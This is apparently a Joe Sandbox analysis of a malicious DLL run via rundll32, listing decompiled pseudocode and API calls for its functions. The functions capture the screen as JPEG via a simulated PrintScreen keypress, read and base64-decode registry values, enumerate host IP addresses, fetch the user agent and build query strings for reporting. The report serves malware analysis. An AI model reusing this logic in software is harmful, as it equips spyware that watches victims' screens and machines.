Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 1000460D, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 109
sleep

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E1000460D(void* __ecx, intOrPtr* _a4) {
				void* _v8;
				char _v12;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v52;
				void* __ebx;
				void* _t26;
				void* _t31;
				intOrPtr* _t33;
				void* _t35;
				char* _t38;
				intOrPtr _t43;
				intOrPtr* _t49;
				intOrPtr* _t54;
				char _t56;
				intOrPtr _t58;

				_t50 = __ecx;
				_t56 = 0;
				E100037EA(1, __ecx, 0x2c, 0x45, 1, 0); // executed
				Sleep(0x3e8); // executed
				E100037EA(1, _t50, 0x2c, 0x45, 3, 0); // executed
				E10003716(0);
				_t26 = E100033DC(2);
				_t57 = _t26;
				E10003207();
				if(_t26 != 0) {
					_push(0);
					_v36 = 1;
					_push( &_v36);
					_v32 = 0;
					_push( &_v12);
					_v28 = 0;
					_v24 = 0;
					L10006C2C(); // executed
					_t31 = E10003FDF(L"image/jpeg",  &_v52); // executed
					if(_t31 != 0) {
						_t33 = E10003FBE(_t31, _t57, 0); // executed
						_t49 = _t33;
						_v8 = 0;
						_t35 = E100032FF(0, 1,  &_v8); // executed
						if(_t35 == 0) {
							_push(0);
							_t38 =  &_v52;
							_push(_t38);
							_push(_v8);
							_push( *((intOrPtr*)(_t49 + 4)));
							L10006C44(); // executed
							if(_t38 != 0) {
								 *((intOrPtr*)(_t49 + 8)) = _t38;
							}
							E100035AE(_v8,  &_v20);
							_t58 = _v20;
							 *_a4 = _t58;
							E1000353E(_v8);
							_t43 = E10003F01(); // executed
							_t56 = _t43;
							E100034C8(_v8, _t56, _t58);
							_t54 = _v8;
							 *((intOrPtr*)( *_t54 + 8))(_t54, _t58);
						}
						if(_t49 != 0) {
							 *((intOrPtr*)( *_t49))(1); // executed
						}
					}
					_push(_v12);
					L10006C32(); // executed
					return _t56;
				}
				return 0;
			}

0x1000460d
0x10004616
0x10004621
0x1000462e
0x1000463b
0x10004641
0x10004648
0x10004650
0x10004652
0x10004659
0x10004662
0x10004666
0x10004669
0x1000466d
0x10004670
0x10004671
0x10004674
0x10004677
0x10004685
0x1000468e
0x10004692
0x10004697
0x10004699
0x100046a3
0x100046ad
0x100046af
0x100046b0
0x100046b3
0x100046b4
0x100046b7
0x100046ba
0x100046c1
0x100046c3
0x100046c3
0x100046cd
0x100046d5
0x100046db
0x100046dd
0x100046e3
0x100046e8
0x100046ef
0x100046f4
0x100046fd
0x100046fd
0x10004702
0x1000470a
0x1000470a
0x10004702
0x1000470c
0x1000470f
0x00000000
0x10004714
0x00000000

APIs

Part of subcall function 100037EA: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?,10004626,0000002C,00000045,00000001,00000000,00000000,00000000,00000000,100074FC,00000006,00000000,100075D0), ref: 10003800
Part of subcall function 100037EA: LoadLibraryA.KERNEL32(00000000), ref: 1000380D
Part of subcall function 100037EA: GetProcAddress.KERNEL32(00000000,00000000,00000001,?,10004626,0000002C,00000045,00000001,00000000,00000000,00000000,00000000,100074FC,00000006,00000000,100075D0), ref: 1000382C
Part of subcall function 100037EA: keybd_event.USER32(00000000,00000000,00000000,00000001,?,10004626,0000002C,00000045,00000001,00000000,00000000,00000000,00000000,100074FC,00000006,00000000), ref: 10003842

Sleep.KERNELBASE(000003E8,?,00000000,00000000,00000000,100074FC,00000006,00000000,100075D0,0000000A,00000000,100074F4,00000006,00000000,100074EC,00000005), ref: 1000462E

Part of subcall function 10003716: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000001,?,?,10004646,00000000,0000002C,00000045,00000003,00000000,?,00000000,00000000,00000000), ref: 10003730
Part of subcall function 10003716: LoadLibraryA.KERNEL32(00000000), ref: 1000373D
Part of subcall function 10003716: GetProcAddress.KERNEL32(00000000,00000000,?,?,10004646,00000000,0000002C,00000045,00000003,00000000,?,00000000,00000000,00000000,100074FC,00000006), ref: 1000375C

Part of subcall function 100033DC: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000001,?,?,1000464D,00000002,00000000,0000002C,00000045,00000003,00000000,?,00000000,00000000), ref: 100033F6
Part of subcall function 100033DC: LoadLibraryA.KERNEL32(00000000), ref: 10003403
Part of subcall function 100033DC: GetProcAddress.KERNEL32(00000000,00000000,?,?,1000464D,00000002,00000000,0000002C,00000045,00000003,00000000,?,00000000,00000000,00000000,100074FC), ref: 10003422

Part of subcall function 10003207: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000001,?,?,10004657,?,?,?,?,?,?,?,00000000,00000000), ref: 10003221
Part of subcall function 10003207: LoadLibraryA.KERNEL32(00000000), ref: 1000322E
Part of subcall function 10003207: GetProcAddress.KERNEL32(00000000,00000000,?,?,10004657,?,?,?,?,?,?,?,00000000,00000000,00000000,100074FC), ref: 1000324D

GdiplusStartup.GDIPLUS(00000005,0000000A,00000000,?,?,?,?,?,?,?,00000000,00000000,00000000,100074FC,00000006,00000000), ref: 10004677

Part of subcall function 10003FDF: GdipGetImageEncodersSize.GDIPLUS(00000000,0000000A,00000001,100074FC,00000005,0000000A,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 10003FF6
Part of subcall function 10003FDF: GdipGetImageEncoders.GDIPLUS(00000000,0000000A,00000000,00000000,00000000,00000000,0000000A,00000001,100074FC,00000005,0000000A,00000000), ref: 10004031

GdiplusShutdown.GDIPLUS(00000005,00000005,0000000A,00000000,?,?,?,?,?,?,?,00000000,00000000,00000000,100074FC,00000006), ref: 1000470F

Part of subcall function 10003FBE: GdipAlloc.GDIPLUS(00000010,?,10004697,00000000,00000000,00000005,0000000A,00000000,?,?,?,?,?,?,?,00000000), ref: 10003FC3

Part of subcall function 100032FF: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,100046A8,00000000,00000001,00000000,00000000,00000000,00000005,0000000A,00000000), ref: 10003319
Part of subcall function 100032FF: LoadLibraryA.KERNEL32(00000000), ref: 10003326
Part of subcall function 100032FF: GetProcAddress.KERNEL32(00000000,00000000,?,?,100046A8,00000000,00000001,00000000,00000000,00000000,00000005,0000000A,00000000), ref: 10003345
Part of subcall function 100032FF: CreateStreamOnHGlobal.OLE32(0000000A,00000005,00000000,?,?,100046A8,00000000,00000001,00000000,00000000,00000000,00000005,0000000A,00000000), ref: 10003358

GdipSaveImageToStream.GDIPLUS(?,00000000,100074FC,00000000,?,?,00000005,0000000A,00000000), ref: 100046BA

Part of subcall function 100035AE: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,100046D2,00000000,00000000,?,00000000,100074FC,00000000,?,?,00000005), ref: 100035C8
Part of subcall function 100035AE: LoadLibraryA.KERNEL32(00000000), ref: 100035D5
Part of subcall function 100035AE: GetProcAddress.KERNEL32(00000000,00000000,?,?,100046D2,00000000,00000000,?,00000000,100074FC,00000000,?,?,00000005,0000000A,00000000), ref: 100035F4

Part of subcall function 1000353E: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,100046E2,00000000,00000000,00000000,?,00000000,100074FC,00000000), ref: 10003558
Part of subcall function 1000353E: LoadLibraryA.KERNEL32(00000000), ref: 10003565
Part of subcall function 1000353E: GetProcAddress.KERNEL32(00000000,00000000,?,?,100046E2,00000000,00000000,00000000,?,00000000,100074FC,00000000,?,?,00000005,0000000A), ref: 10003584

Part of subcall function 100034C8: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,100046F4,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 100034E2
Part of subcall function 100034C8: LoadLibraryA.KERNEL32(00000000), ref: 100034EF
Part of subcall function 100034C8: GetProcAddress.KERNEL32(00000000,00000000,?,?,100046F4,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,100074FC,00000000), ref: 1000350E

Strings

image/jpeg, xrefs: 10004680

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10005246, Relevance: 7.6, APIs: 5, Instructions: 107
registry

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E10005246(void* __ecx, intOrPtr* _a4) {
				void* _v8;
				int _v12;
				signed int _v16;
				intOrPtr* _v20;
				char* _t22;
				long _t24;
				char* _t32;
				void* _t38;
				intOrPtr _t40;
				char* _t47;
				void* _t50;
				void* _t53;
				int* _t56;
				char* _t58;
				intOrPtr* _t60;

				_t56 = 0;
				_t22 = E10002F3F(__ecx, 0x10007530, 0x43);
				_v8 = _v8 & 0;
				_t58 = _t22;
				_pop(_t50);
				_t24 = RegOpenKeyExA(0x80000002, _t58, 0, 1,  &_v8); // executed
				if(_t24 != 0) {
					RegOpenKeyExA(0x80000001, _t58, 0, 1,  &_v8); // executed
				}
				E10003F0A(_t58);
				_t47 = E10002F3F(_t50, 0x10007574, 6);
				_v12 = 0;
				if(RegQueryValueExA(_v8, _t47, 0, 0, 0,  &_v12) == 0) {
					_push(_v12);
					_t32 = E10003F01();
					_pop(_t53);
					RegQueryValueExA(_v8, _t47, 0, 0, _t32,  &_v12);
					_push(8);
					_t60 = E10003F01();
					_v20 = _t60;
					 *_t60 = E10002F3F(_t53, 0x100073a0, 0x2c);
					_v16 = _v16 & 0x00000000;
					_t38 = E10002D4B(_t32, _v12,  &_v16);
					E10003F0A(_t32);
					_push(_v16 + 1);
					_t40 = E10003F01();
					_t56 = _v20;
					 *((intOrPtr*)(_t56 + 4)) = _t40;
					E100030DF(_t40, _t38, _v16);
					E10003F0A(_t38);
					 *_a4 = 2;
				}
				E10003F0A(_t47);
				RegCloseKey(_v8);
				return _t56;
			}

0x10005256
0x10005258
0x1000525d
0x10005260
0x1000526c
0x10005277
0x1000527b
0x1000528a
0x1000528a
0x1000528d
0x100052a7
0x100052ae
0x100052bd
0x100052bf
0x100052c2
0x100052c7
0x100052d7
0x100052d9
0x100052e0
0x100052e9
0x100052f1
0x100052f6
0x100052ff
0x10005307
0x10005310
0x10005311
0x10005316
0x10005319
0x10005321
0x10005327
0x10005332
0x10005332
0x10005339
0x10005342
0x10005350

APIs

RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,00000001,?,00000000,00000000,00000010,10005B31,?,00000000), ref: 10005277
RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00000001,?,?,00000000), ref: 1000528A
RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 100052B9
RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 100052D7

Part of subcall function 10002D4B: CryptStringToBinaryA.CRYPT32(0000002C,100073A0,00000001,00000000,?,00000000,00000000), ref: 10002D61
Part of subcall function 10002D4B: CryptStringToBinaryA.CRYPT32(0000002C,100073A0,00000001,00000000,?,00000000,00000000), ref: 10002D83

RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 10005342

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10006BCF, Relevance: 7.5, APIs: 5, Instructions: 36
windowthread

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10006BCF() {
				struct tagMSG _v32;
				void* _t4;
				void* _t13;

				_t4 = CreateThread(0, 0, E10002CA0, 0, 0, 0); // executed
				_t13 = _t4;
				while(GetMessageA( &_v32, 0, 0, 0) != 0) {
					TranslateMessage( &_v32);
					DispatchMessageA( &_v32);
				}
				return CloseHandle(_t13);
			}

0x10006be3
0x10006be9
0x10006c01
0x10006bf1
0x10006bfb
0x10006bfb
0x10006c1e

APIs

CreateThread.KERNEL32(00000000,00000000,10002CA0,00000000,00000000,00000000), ref: 10006BE3
TranslateMessage.USER32(?), ref: 10006BF1
DispatchMessageA.USER32(?), ref: 10006BFB
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 10006C08
CloseHandle.KERNEL32(00000000), ref: 10006C13

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10005528, Relevance: 6.1, APIs: 4, Instructions: 63
network

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E10005528(void* __ecx, void* __eflags) {
				char _v404;
				int _t10;
				signed int _t13;
				unsigned int* _t14;
				signed int _t16;
				signed int _t22;
				char* _t23;
				intOrPtr* _t25;

				_t16 = 0;
				E10003104( &_v404, 0, 0x190);
				_push( &_v404);
				_push(0x202); // executed
				L10006C6E(); // executed
				_push(0x104);
				_t23 = E10003F01();
				_t10 = gethostname(_t23, 0x104); // executed
				if(_t10 == 0) {
					_push(_t23); // executed
					L10006C62(); // executed
					if(_t10 != 0) {
						_t25 =  *((intOrPtr*)(_t10 + 0xc));
						_t22 = 0;
						if( *_t25 != 0) {
							_t13 = 0;
							do {
								_t14 =  *(_t13 + _t25);
								if( *_t14 != 0xa9 ||  *_t14 >> 8 != 0xfe) {
									if( *_t14 != 0x100007f) {
										_t16 = 1;
									} else {
										goto L7;
									}
								} else {
									goto L7;
								}
								goto L10;
								L7:
								_t22 = _t22 + 1;
								_t13 = _t22 << 2;
							} while ( *(_t13 + _t25) != _t16);
						}
					}
				}
				L10:
				E10003F0A(_t23);
				L10006C74(); // executed
				return _t16;
			}

0x1000553f
0x10005543
0x10005551
0x10005552
0x10005557
0x10005561
0x10005568
0x1000556c
0x10005573
0x10005575
0x10005576
0x1000557d
0x1000557f
0x10005582
0x10005586
0x10005588
0x1000558a
0x1000558a
0x10005590
0x100055a2
0x100055b1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x100055a4
0x100055a4
0x100055a7
0x100055aa
0x100055af
0x10005586
0x1000557d
0x100055b3
0x100055b4
0x100055ba
0x100055c7

APIs

WSAStartup.WS2_32(00000202,?), ref: 10005557
gethostname.WS2_32(00000000,00000104), ref: 1000556C
gethostbyname.WS2_32(00000000), ref: 10005576
WSACleanup.WS2_32 ref: 100055BA

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10004571, Relevance: 6.1, APIs: 4, Instructions: 53
registry

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E10004571() {
				int _v8;
				void* _v12;
				void* __ecx;
				void* _t24;
				char* _t31;

				_push(_t24);
				_push(_t24);
				_t30 = E10002F3F(_t24, 0x10007324, 0x2b);
				RegOpenKeyExA(0x80000002, _t9, 0, 1,  &_v12); // executed
				E10003F0A(_t30);
				_v8 = 0;
				RegQueryValueExA(_v12, 0x10007360, 0, 0, 0,  &_v8); // executed
				_push(_v8);
				_t31 = E10003F01();
				RegQueryValueExA(_v12, 0x10007360, 0, 0, _t31,  &_v8); // executed
				RegCloseKey(_v12);
				return _t31;
			}

0x10004574
0x10004575
0x10004586
0x10004597
0x1000459e
0x100045a7
0x100045b7
0x100045bd
0x100045c6
0x100045d5
0x100045de
0x100045eb

APIs

RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,00000001,771CC486,771CC486,00000000,?,?,?,1000498D,00000000,00000000,00002710,771CC486,00000000), ref: 10004597
RegQueryValueExA.KERNEL32(771CC486,10007360,00000000,00000000,00000000,00000000,?,?,?,1000498D,00000000,00000000,00002710,771CC486,00000000), ref: 100045B7
RegQueryValueExA.KERNEL32(771CC486,10007360,00000000,00000000,00000000,00000000,?,?,?,1000498D,00000000,00000000,00002710,771CC486,00000000), ref: 100045D5
RegCloseKey.ADVAPI32(771CC486,?,?,?,1000498D,00000000,00000000,00002710,771CC486,00000000), ref: 100045DE

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 100032FF, Relevance: 6.1, APIs: 4, Instructions: 52
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E100032FF(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				CHAR* _v8;
				void* __ecx;
				CHAR* _t6;
				CHAR* _t8;
				_Unknown_base(*)()* _t9;
				void* _t13;
				void* _t16;
				void* _t18;
				void* _t20;
				void* _t25;
				CHAR* _t26;
				struct HINSTANCE__* _t29;

				_push(_t18);
				_t16 = 0;
				_t6 = E10002F3F(_t18, 0x100071e8, 9);
				_t20 = _t25;
				_t26 = _t6;
				_t29 = GetModuleHandleA(_t26);
				if(_t29 != 0) {
					L2:
					_t8 = E10002F3F(_t20, 0x100072bc, 0x15);
					_v8 = _t8;
					_t9 = GetProcAddress(_t29, _t8);
					if(_t9 != 0) {
						_t13 =  *_t9(_a4, _a8, _a12); // executed
						_t16 = _t13;
					}
					E10003F0A(_v8);
				} else {
					_t29 = LoadLibraryA(_t26);
					if(_t29 != 0) {
						goto L2;
					}
				}
				E10003F0A(_t26);
				return _t16;
			}

0x10003302
0x1000330d
0x1000330f
0x10003315
0x10003316
0x1000331f
0x10003323
0x10003332
0x10003339
0x10003342
0x10003345
0x1000334d
0x10003358
0x1000335a
0x1000335a
0x1000335f
0x10003325
0x1000332c
0x10003330
0x00000000
0x00000000
0x10003330
0x10003366
0x10003374

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,100046A8,00000000,00000001,00000000,00000000,00000000,00000005,0000000A,00000000), ref: 10003319
LoadLibraryA.KERNEL32(00000000), ref: 10003326
GetProcAddress.KERNEL32(00000000,00000000,?,?,100046A8,00000000,00000001,00000000,00000000,00000000,00000005,0000000A,00000000), ref: 10003345
CreateStreamOnHGlobal.OLE32(0000000A,00000005,00000000,?,?,100046A8,00000000,00000001,00000000,00000000,00000000,00000005,0000000A,00000000), ref: 10003358

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 100036A0, Relevance: 6.1, APIs: 4, Instructions: 52
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E100036A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				CHAR* _v8;
				void* __ecx;
				CHAR* _t6;
				CHAR* _t8;
				_Unknown_base(*)()* _t9;
				void* _t13;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t18;
				void* _t20;
				void* _t25;
				CHAR* _t26;
				struct HINSTANCE__* _t29;

				_push(_t18);
				_t16 = 0;
				_t6 = E10002F3F(_t18, 0x100071f4, 0xa);
				_t20 = _t25;
				_t26 = _t6;
				_t29 = GetModuleHandleA(_t26);
				if(_t29 != 0) {
					L2:
					_t8 = E10002F3F(_t20, 0x100072d4, 0x15);
					_v8 = _t8;
					_t9 = GetProcAddress(_t29, _t8);
					if(_t9 != 0) {
						_t13 =  *_t9(_a4, _a8, _a12); // executed
						_t16 = _t13;
					}
					E10003F0A(_v8);
				} else {
					_t14 = LoadLibraryA(_t26); // executed
					_t29 = _t14;
					if(_t29 != 0) {
						goto L2;
					}
				}
				E10003F0A(_t26);
				return _t16;
			}

0x100036a3
0x100036ae
0x100036b0
0x100036b6
0x100036b7
0x100036c0
0x100036c4
0x100036d3
0x100036da
0x100036e3
0x100036e6
0x100036ee
0x100036f9
0x100036fb
0x100036fb
0x10003700
0x100036c6
0x100036c7
0x100036cd
0x100036d1
0x00000000
0x00000000
0x100036d1
0x10003707
0x10003715

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,771CC486,00000000,?,?,1000416B,00000000,1000735C,00000000,771CC486,?,?,1000542C,00002710,771CC486), ref: 100036BA
LoadLibraryA.KERNEL32(00000000), ref: 100036C7
GetProcAddress.KERNEL32(00000000,00000000,?,?,1000416B,00000000,1000735C,00000000,771CC486,?,?,1000542C,00002710,771CC486,00000000,00000000), ref: 100036E6
ObtainUserAgentString.URLMON(00000000,?,10005B31,?,?,1000416B,00000000,1000735C,00000000,771CC486,?,?,1000542C,00002710,771CC486,00000000), ref: 100036F9

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10005696, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 79
string

C-Code - Quality: 74%

			E10005696(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				CHAR* _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				CHAR* _t20;
				int _t22;
				void* _t23;
				void* _t25;
				void* _t37;
				intOrPtr _t41;
				void* _t42;
				void* _t47;
				CHAR* _t49;
				int _t50;
				void* _t51;

				_t47 = __ecx;
				_t20 = E10002F3F(__ecx, 0x100074e8, 2);
				_push(_a8);
				_t49 = _t20;
				_v8 = _t49;
				_t41 = E10002B95();
				_v12 = _t41;
				_t22 = lstrlenA(_t49);
				_push(_a4);
				_t50 = _t22;
				_t23 = E10002B95();
				_t5 = _t41 + 8; // 0x8
				_push(_t5 + _t23 + _t50); // executed
				_t25 = E10003F01(); // executed
				_t42 = _t25;
				E100030DF(_t42, _v8, _t50);
				E100030DF(_t42 + _t50, 0x100075e0, 1);
				_t51 = _t50 + 1;
				E100030DF(_t51 + _t42, _t47 + 0x14, 4);
				_t52 = _t51 + 4;
				_v20 = 0x3d732526;
				_t12 =  &_v20; // 0x3d732526
				_v16 = 0;
				E100030DF(_t52 + wsprintfA(_t51 + 4 + _t42, _t12, _a4) + _t42, _a8, _v12);
				_t37 = E10002F91(_t42 + _t50, _t52 + wsprintfA(_t51 + 4 + _t42, _t12, _a4), _t42, _t52 + wsprintfA(_t51 + 4 + _t42, _t12, _a4) + _v12, 1); // executed
				E10003F0A(_t42);
				E10003F0A(_v8);
				return _t37;
			}

0x100056a6
0x100056a8
0x100056ad
0x100056b0
0x100056b2
0x100056bd
0x100056bf
0x100056c3
0x100056c9
0x100056cc
0x100056ce
0x100056d5
0x100056da
0x100056db
0x100056e4
0x100056e7
0x100056f7
0x100056fc
0x10005707
0x1000570f
0x10005712
0x10005719
0x1000571c
0x10005738
0x10005747
0x1000574f
0x10005757
0x10005767

APIs

lstrlenA.KERNEL32(00000000,771CA28A,00000000,00000000,?,10004C56,00000000,00000000), ref: 100056C3
wsprintfA.USER32 ref: 10005725

Strings

&%s=VL, xrefs: 10005719, 10005720, 10005724

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10004810, Relevance: 4.5, APIs: 3, Instructions: 16
network

C-Code - Quality: 100%

			E10004810(void** _a4) {
				void** _t7;

				_t7 = _a4;
				InternetCloseHandle(_t7[2]); // executed
				InternetCloseHandle(_t7[1]);
				return InternetCloseHandle( *_t7);
			}

0x1000481b
0x10004821
0x10004826
0x1000482f

APIs

InternetCloseHandle.WININET(?), ref: 10004821
InternetCloseHandle.WININET(?), ref: 10004826
InternetCloseHandle.WININET(00000000), ref: 1000482A

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 100050E9, Relevance: 3.8, APIs: 3, Instructions: 98
string

C-Code - Quality: 89%

			E100050E9(intOrPtr __ecx, void* __edi) {
				CHAR* _v8;
				char _v12;
				CHAR* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				CHAR* _v36;
				intOrPtr _t28;
				CHAR* _t31;
				intOrPtr _t39;
				char _t46;
				void* _t54;
				CHAR* _t64;
				intOrPtr _t65;

				_t46 = 0;
				_v24 = __ecx;
				_v8 = E10002F3F(__ecx, 0x100075a8, 0xd);
				_v12 = 0;
				_t28 = E10005353(__ecx, _t27,  &_v12); // executed
				_v20 = _t28;
				if(_t28 != 0) {
					_t31 = E10002F3F(__ecx, 0x100075c4, 9);
					_pop(_t54);
					_v16 = _t31;
					_t8 = lstrlenA(_t31) + 1; // 0x1
					_push(lstrlenA(_v8) + _t8);
					_t64 = E10003F01();
					_v36 = _t64;
					wsprintfA(_t64, _v16, _v8);
					_v32 = E10002F3F(_t54, 0x100075b8, 2);
					_v28 = E10002F3F(_t54, 0x100075bc, 6);
					_t60 = _v20;
					_t65 = _v24;
					_t39 = E1000576A(_t65, _v20, _v12, _t64, _t37, _t38, 0x1000750c, 0xf);
					_v24 = _t39;
					if(_t39 != 0) {
						if( *((intOrPtr*)(_t65 + 8)) != 0) {
							E100028FC( *((intOrPtr*)(_t65 + 8)));
							_t39 = _v24;
						}
						 *((intOrPtr*)(_t65 + 8)) = _t39;
						_t46 = 1;
					}
					E10003F0A(_v28);
					E10003F0A(_v32);
					E10003F0A(_v36);
					E10003F0A(_v16);
					E100028FC(_t60);
				}
				E10003F0A(_v8);
				return _t46;
			}

0x100050f3
0x100050fc
0x10005109
0x10005110
0x10005113
0x10005118
0x1000511d
0x1000512b
0x10005137
0x10005139
0x10005141
0x10005148
0x10005151
0x10005156
0x1000515a
0x10005175
0x10005180
0x1000518c
0x10005193
0x10005199
0x1000519e
0x100051a3
0x100051a8
0x100051ad
0x100051b2
0x100051b5
0x100051b6
0x100051b9
0x100051b9
0x100051be
0x100051c6
0x100051ce
0x100051d6
0x100051dc
0x100051e4
0x100051e8
0x100051f5

APIs

Part of subcall function 10005353: lstrlenA.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,771CC486,00000000,?,?,?,10005C39,00000000,00000000), ref: 1000539B
Part of subcall function 10005353: lstrlenA.KERNEL32(771CC486,?,?,?,00000000,00000000,00000000,00000000,771CC486,00000000,?,?,?,10005C39,00000000,00000000), ref: 100053A2
Part of subcall function 10005353: wsprintfA.USER32 ref: 100053B8

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,771CC486,00000000,?,?,?,10005C39,00000000,00000000,00000000,00000000), ref: 1000513C
lstrlenA.KERNEL32(00000000,?,?,?,10005C39,00000000,00000000,00000000,00000000,?,?,00000000), ref: 10005144
wsprintfA.USER32 ref: 1000515A

Part of subcall function 1000576A: lstrlenA.KERNEL32(00000000,00000000,?,00000000,?,?,1000519E,00000000,00000000,00000000,00000000,00000000,1000750C,0000000F), ref: 100057AB
Part of subcall function 1000576A: lstrlenA.KERNEL32(00000000,?,1000519E,00000000,00000000,00000000,00000000,00000000,1000750C,0000000F), ref: 100057B3
Part of subcall function 1000576A: lstrlenA.KERNEL32(00000000,?,1000519E,00000000,00000000,00000000,00000000,00000000,1000750C,0000000F), ref: 10005819

Part of subcall function 100028FC: GetProcessHeap.KERNEL32(00000008,00008000,?,10002930,00008000,?,1000278D), ref: 1000290B
Part of subcall function 100028FC: HeapFree.KERNEL32(00000000,?,10002930), ref: 10002912

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10005353, Relevance: 3.8, APIs: 3, Instructions: 73string

APIs

lstrlenA.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,771CC486,00000000,?,?,?,10005C39,00000000,00000000), ref: 1000539B
